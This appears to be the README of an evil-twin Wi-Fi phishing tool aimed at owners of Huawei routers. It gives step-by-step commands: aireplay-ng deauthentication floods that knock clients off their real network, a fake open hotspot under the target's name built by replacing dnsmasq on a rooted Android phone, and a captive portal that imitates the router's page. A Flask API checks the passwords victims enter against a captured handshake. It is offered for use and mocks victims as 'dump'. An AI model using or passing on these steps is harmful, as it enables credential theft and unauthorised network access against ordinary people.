Features :] :
- Written in python RUN ANYWHERE!
- very low hardware/network usage
- Optimized for slow hotspots
- Low size assets 1.4mb!
- lightning fast validation with aircrack-ng
- Available in two languages EN/AR
- Extracted from real device
- Looks quite convincing
enjoy :)
- You target should be using Huawei router
verfiy this with airodump '--manufacturer' flag - if your target is dump enough that he doesn't know
what manufacturer is his router then use this template - 1 wifi card OR laptop wifi card
you can use your laptop internal wifi card if you want - 1 wifi card OR Rooted Android +4 to 10 supported
if you have another wifi card that supports ap mode
(hotspot) use it, if not follow android guide - linux with aircrack-ng installed
- Basic linux/wifi tools knowledge
- Brain
- Coffee! //network chuck lol
This project was originally made to run on a android phone!!
i didn't have a wifi card that supports ap mode (hotspot), Android phones
have a really powerfull hotspot range it's just perfect better than any wifi
card you will find on market that's why i made this.....
That said it was very hard to customize hostapd on android to specfic settings,
For the essid just set the target name from android hotspot settings and make the
security open, next we need a custom ip-range the default is 192.168.43.x
which works fine but some devices like Samsung doesn't trigger
'Captive portal login' except on a wierd ip like 200.200.200.x
that's what we want, this setup was made on Android 5 should be working
on 4,5,6,7,8,9,10 starting from 11 there's a random ip-range system
good luck with that, all you need is dnsmasq/dnsmasq.sh script it works as follow:
-
when you activate hotspot hostapd is called first
then it setup the interface wlan0 then calls dnsmasq
with a hard-coded ip range 192.168.43.x -
we intercept hostapd or whatever calls dnsmasq
by making a fake dnsmaq bin so it calls our script
thinking it's dnsmasq at /bin/dnsmasq -
when our script is called we setup wlan0 on whatever
ip-range we want in this case 200.200.200.x then
reserve 200.200.200.1 to ourselves -
call the real dnsmasq with custom options like redirecting
to our apache server -
setup iptables
All you have to do is:
- You need root access
- use a file manager if you don't want to mess with shell
- either use
adb shellthensuor install sudo and su on termux - rename
dnsmasqin/bin/to/bin/dnsmasq.bin
mv /bin/dnsmasq /bin/dnsmasq.bin - copy dnsmasq.sh to /bin/ rename to dnsmasq give the right permission
cp /sdcard/dnsmasq.sh /bin/dnsmasq
chmod +x /bin/dnsmasqi set the permissions as dnsmasq.bin - there should be a log file in /data/misc/wifi when dnsmasq.sh is running
NOTE: if you're planning to use another ip-range change index.html#L137 to where flask is hosted
Now activate hotspot from your settings, you should have a hotspot
running with your target's name with open security,
if you connect to it you should be assigned to 200.200.200.x
next you need apache running
very simple you don't actually need apache you can use python http
like python3 -m http.server 80 run this in the eviltwin folder
For android install apache on termux with apt go to usr/etc/apache2/sites/
copy apache/portal.conf there then copy eviltwin folder there too
use sudo for port 80 to work sudo apachectl verfiy it's running with
curl 127.0.0.1 or top top | grep httpd if it's working then you're done!
For normal whatever device use whatever http client you want or use apache
install apache if you don't have it add portal.conf to your apache sites folder
change the DocumentRoot to eviltwin directory, then run apache verfiy it's
running using curl curl 127.0.0.1
this for linux users only, you need to setup a hotspot using hostapd
make a config for it with your target's name and open security,
google 'linux setup hostapd'
- run hostapd
- run dnsmasq with dnsmasq/dnsmasq.conf
it should assign users to 200.200.200.x
then redirect to 200.200.200.1 your apache
NOTE: if you're planning to use another ip-range change index.html#L137 to where flask is hosted
-
pip install flask -
copy your target handshake and rename to 'evil.cap'
cp path/handshake.cap .
mv handshake.cap evil.cap -
Set your target MAC address use aircrack to get it
$ aircrack-ng evil.cap Reading packets, please wait... Opening evil.cap Read 3258 packets. # BSSID ESSID Encryption 1 5C:F9:6A:FC:17:2B Huawei-172F WPA (0 handshake, with PMKID) 2 C2:F0:00:2F:90:D2 UnknownCopy BSSID of your target and paste in flask.py#L5 as target
Note that your target should have a handshake/pkmid in evil.cap
In my case it has a PKMID -
python3 passapi.pynow password verification api is online
you can play with it usingcurl 127.0.0.1:5000/pass 'pass=12345678'
it should reply with 'Allgood' or 'notgood' if password is incorrect
NOTE: if you're planning to use another ip-range change index.html#L137 to where flask is hosted
-
we run a deuth attack on the target's router
airmon-ng start wlan0
airodump-ng wlan0mon -c 5put your target's channel
aireplay-ng -0 0 -a MA:CA:DD:RE:SS wlan0monput your target's mac address -
all clients connected to target router are disconnected
-
user connect to your hotspot cuz he's dump
-
dnsmasq redirect all his requests to your http server
that servers our eviltwin template asking for password -
user enters a password
-
password is sent back to our flask api then it
runs aircrack-ng with a handshake you supplied
and check if the password is correct -
our flask api replies with 'Allgood'/'notgood' to the user
-
if 'notgood' ask user to enter a correct password
if 'Allgood' make update animation -
if you got the password you should stop aireplay
enjoy your wifi!
-
@athanstan
i copied the upgrading animation from him,
he also has good repos check it out!
pm on telegram for any queries @Pine_Orange or @xd2222
if you liked this project you can support me by donating to the following address,
THANKS!
- XMR -
433CbZXrdTBQzESkZReqQp1TKmj7MfUBXbc8FkG1jpVTBFxY9MCk1RXPWSG6CnCbqW7eiMTEGFgbHXj3rx3PxZadPgFD3DX
